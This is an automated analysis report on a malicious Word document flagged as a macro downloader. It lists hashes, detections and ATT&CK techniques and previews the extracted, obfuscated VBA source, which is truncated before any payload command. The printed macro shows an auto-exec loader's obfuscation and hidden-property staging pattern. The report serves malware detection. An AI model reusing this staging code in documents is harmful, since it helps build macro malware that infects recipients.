Office (OLE) malware analysis — malicious · df0c6477bbad003c

MALICIOUS

Office (OLE)

100.9 KB Created: 2019-12-19 13:19:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 8a9b009e6388fe9e9d216c8246ca5c8b SHA-1: 2e2eb011703e05ad8b7d20445ac5b9ad4f0a22bb SHA-256: df0c6477bbad003cae5aa4c6d82e9b322fc079c3cd62e7a96f52aeeca677d402

302 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro and a UserForm hidden-property command stager, which are indicative of malicious intent. The presence of these elements suggests the file is designed to execute arbitrary code, likely downloading a secondary payload. The ClamAV detection further supports its malicious classification.

Heuristics 8

ClamAV: Doc.Malware.Sagent-7465573-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Sagent-7465573-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13722 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13722 bytes
SHA-256: `a16196ec1104ab16dc48d7652e1d8c5db4a705aec2d86b153cf27038dfbacae2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Pvndiiiiicafg" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Yeihgdlu, 0, 0, MSForms, TextBox" Private Sub Document_open() Cgwqqrxw = "Laboriosam non modi voluptas." Dim Qsewuxwbvt As Boolean Dim Nhvceddntmmp As Boolean Vwexytxnkpb = ("Omnis soluta earum consequatur enim neque mollitia quod.") Dim Ncirlbksounnt As String Dim Segowfczwxvg As Double Dim Wgbfgpllvanpw As Boolean Qjeaevgi = Rlcltqvq Dim Omindihifbgj As Double Gorgpeqxpcoei = ("Est provident dolor laudantium.") Dim Kszconda As Double Dim Vnxdlvipeffyo As Double Dim Brxfzzzigui As Double Hkcnajurt = "Qui nobis autem optio." Dim Hgpdtwle As String Dim Nwgvrwwerid As Boolean Dim Hudsyegx As Double Tytkwpjieisuo = ("Quis.") Dim Imxmblatehjq As Boolean Zsqeznwymzp = 804 Zfimfhaprikgk = Ocnyfvepb Ivkaywumbnw = 144 Svqoifzvpsjq Eayiupkt = "Et similique veritatis laborum fuga alias minima quas." Dim Wgbghfdekj As String Dim Piepdknesx As Double Npbjrztgorhva = ("Eveniet eum.") Dim Fhafczulqde As Double Dim Gyryietsdtmkq As Integer Dim Xajpfvixrrvy As Integer Lgnntaqa = Vfwbnnulda Dim Togexbzhnga As Double Nzxwvdwsxuay = ("Consequatur blanditiis doloribus quia.") Dim Exjuspwmyh As Boolean Dim Pbbzpeij As Boolean Dim Xohwrwwuffq As Double Jdlhywabpgsn = "Ann" Dim Yevqxkqavmvy As Integer Dim Dbkmyfrvdwj As String Dim Mhhpivfyqkptg As Integer Iymawlxowg = ("Dolorem corporis omnis repudiandae.") Dim Zcayhkldsnx As Integer Uqnrvsra = 87 Fkiqnpsljte = Plhivbqubawcu Bnxprovoyuxoa = 520 End Sub Attribute VB_Name = "Llzjsomymu" Attribute VB_Base = "0{B063551D-358A-4682-802E-27D87D913A49}{47510570-C273-4B35-BFC5-0F24BD599AF9}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Qnrnsagenrr" Function Puenvxqhppza() Krvppctxch = "Tenetur repellat." Dim Byifymhvcv As Boolean Dim Hvgharfdiomkn As Double Xvjjxrhzuk = ("Consequuntur.") Dim Texhpuyhuwl As String Dim Cmznmyszcj As Integer Dim Mzfzwlxhbmzl As Double Ppqqbjmyvfhli = Qquxodvs Dim Kopjpmogoicil As String Gndarkckhkv = ("Cumque dolorem provident.") Dim Ruuwitrvwpg As Integer Dim Fudxifmhiqrs As Integer Dim Hdiyuiboto As Boolean Sqvjxxhyfihjc = "Ut explicabo quo a quibusdam aut ut repudiandae." Dim Gjecdrgjrorl As Integer Dim Qaprimvmysul As String Dim Zwzwdqvfp As Double Hlgdvglx = ("Est reiciendis tempora accusamus dolor nostrum ut omnis commodi debitis.") Dim Hrrtdvtllhs As Boolean Kuouitwllcpaa = 94 Cmjnlrreh = Ubtdfkim Gldejewpct = 265 Hibzcahxggniu = Pvndiiiiicafg.Yeihgdlu Zdzfojhjet = "Temporibus saepe unde omnis." Dim Muihmbxcd As String Dim Pqiryutcv As Double Lcgxbqrblmzzx = ("Delectus est sequi quidem.") Dim Tswjfgbxj As Integer Dim Siokqbfnj As String Dim Ozhkcnuq As String Hsbbgmxrje = Uximavytjz Dim Dwbuenctxwkq As String Kpivzbdfek = ("Doloremque voluptas ut fuga.") Dim Mzrxaisjxjk As String Dim Wcdlymsyrkj As Double Dim Zzoysrtobdb As Double Cxemafgidyzu = "Aut quas animi aperiam cupiditate blanditiis facilis et quod in." Dim Iruoimnituyrs As Integer Dim Uzckdkuufjeef As String Dim Oemukxgo As Boolean Iueknjmxjjz = ("Ted") Dim Cnoxpeeihl As Integer Ufxybnkjw = 930 Pkrargvnaru = Wzrjofail Eoyivonmhxyn = 174 Sdrtiwrtipp = Hibzcahxggniu + Llzjsomymu.Njxcnafirzawl + Llzjsomymu.Kodscscwipa + Llzjsomymu.Wobtmsvxjz Pteetwqlpd = "Fugit." Dim Arssquqyj As Integer Dim Ksuvhhrmgzgc As Boolean Lkadbqtv = ("Cumque.") Dim Vltqyimc As String Dim Ulyaidxr As Integer Dim Uofsfkqvi As Boolean Okqavnbo = Dtlfzmzuxt Dim Bjgfblosqus As Integer Bianpwcju = ("Praesentium voluptates at amet voluptatem.") Dim Umfxqakxyaig As Integer Dim Mpzfwjalzxd As Double Dim Hwzegsllp As String Bqjvcfsb ... (truncated)

SHA-256: a16196ec1104ab16dc48d7652e1d8c5db4a705aec2d86b153cf27038dfbacae2

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Pvndiiiiicafg"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Yeihgdlu, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Cgwqqrxw = "Laboriosam non modi voluptas."
Dim Qsewuxwbvt As Boolean
Dim Nhvceddntmmp As Boolean
Vwexytxnkpb = ("Omnis soluta earum consequatur enim neque mollitia quod.")
Dim Ncirlbksounnt As String
Dim Segowfczwxvg As Double
Dim Wgbfgpllvanpw As Boolean
Qjeaevgi = Rlcltqvq
Dim Omindihifbgj As Double
Gorgpeqxpcoei = ("Est provident dolor laudantium.")
Dim Kszconda As Double
Dim Vnxdlvipeffyo As Double
Dim Brxfzzzigui As Double
Hkcnajurt = "Qui nobis autem optio."
Dim Hgpdtwle As String
Dim Nwgvrwwerid As Boolean
Dim Hudsyegx As Double
Tytkwpjieisuo = ("Quis.")
Dim Imxmblatehjq As Boolean
Zsqeznwymzp = 804
Zfimfhaprikgk = Ocnyfvepb
Ivkaywumbnw = 144
Svqoifzvpsjq
   Eayiupkt = "Et similique veritatis laborum fuga alias minima quas."
Dim Wgbghfdekj As String
Dim Piepdknesx As Double
Npbjrztgorhva = ("Eveniet eum.")
Dim Fhafczulqde As Double
Dim Gyryietsdtmkq As Integer
Dim Xajpfvixrrvy As Integer
Lgnntaqa = Vfwbnnulda
Dim Togexbzhnga As Double
Nzxwvdwsxuay = ("Consequatur blanditiis doloribus quia.")
Dim Exjuspwmyh As Boolean
Dim Pbbzpeij As Boolean
Dim Xohwrwwuffq As Double
Jdlhywabpgsn = "Ann"
Dim Yevqxkqavmvy As Integer
Dim Dbkmyfrvdwj As String
Dim Mhhpivfyqkptg As Integer
Iymawlxowg = ("Dolorem corporis omnis repudiandae.")
Dim Zcayhkldsnx As Integer
Uqnrvsra = 87
Fkiqnpsljte = Plhivbqubawcu
Bnxprovoyuxoa = 520
End Sub

Attribute VB_Name = "Llzjsomymu"
Attribute VB_Base = "0{B063551D-358A-4682-802E-27D87D913A49}{47510570-C273-4B35-BFC5-0F24BD599AF9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Qnrnsagenrr"
Function Puenvxqhppza()
   Krvppctxch = "Tenetur repellat."
Dim Byifymhvcv As Boolean
Dim Hvgharfdiomkn As Double
Xvjjxrhzuk = ("Consequuntur.")
Dim Texhpuyhuwl As String
Dim Cmznmyszcj As Integer
Dim Mzfzwlxhbmzl As Double
Ppqqbjmyvfhli = Qquxodvs
Dim Kopjpmogoicil As String
Gndarkckhkv = ("Cumque dolorem provident.")
Dim Ruuwitrvwpg As Integer
Dim Fudxifmhiqrs As Integer
Dim Hdiyuiboto As Boolean
Sqvjxxhyfihjc = "Ut explicabo quo a quibusdam aut ut repudiandae."
Dim Gjecdrgjrorl As Integer
Dim Qaprimvmysul As String
Dim Zwzwdqvfp As Double
Hlgdvglx = ("Est reiciendis tempora accusamus dolor nostrum ut omnis commodi debitis.")
Dim Hrrtdvtllhs As Boolean
Kuouitwllcpaa = 94
Cmjnlrreh = Ubtdfkim
Gldejewpct = 265
Hibzcahxggniu = Pvndiiiiicafg.Yeihgdlu
   Zdzfojhjet = "Temporibus saepe unde omnis."
Dim Muihmbxcd As String
Dim Pqiryutcv As Double
Lcgxbqrblmzzx = ("Delectus est sequi quidem.")
Dim Tswjfgbxj As Integer
Dim Siokqbfnj As String
Dim Ozhkcnuq As String
Hsbbgmxrje = Uximavytjz
Dim Dwbuenctxwkq As String
Kpivzbdfek = ("Doloremque voluptas ut fuga.")
Dim Mzrxaisjxjk As String
Dim Wcdlymsyrkj As Double
Dim Zzoysrtobdb As Double
Cxemafgidyzu = "Aut quas animi aperiam cupiditate blanditiis facilis et quod in."
Dim Iruoimnituyrs As Integer
Dim Uzckdkuufjeef As String
Dim Oemukxgo As Boolean
Iueknjmxjjz = ("Ted")
Dim Cnoxpeeihl As Integer
Ufxybnkjw = 930
Pkrargvnaru = Wzrjofail
Eoyivonmhxyn = 174
Sdrtiwrtipp = Hibzcahxggniu + Llzjsomymu.Njxcnafirzawl + Llzjsomymu.Kodscscwipa + Llzjsomymu.Wobtmsvxjz
   Pteetwqlpd = "Fugit."
Dim Arssquqyj As Integer
Dim Ksuvhhrmgzgc As Boolean
Lkadbqtv = ("Cumque.")
Dim Vltqyimc As String
Dim Ulyaidxr As Integer
Dim Uofsfkqvi As Boolean
Okqavnbo = Dtlfzmzuxt
Dim Bjgfblosqus As Integer
Bianpwcju = ("Praesentium voluptates at amet voluptatem.")
Dim Umfxqakxyaig As Integer
Dim Mpzfwjalzxd As Double
Dim Hwzegsllp As String
Bqjvcfsb
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.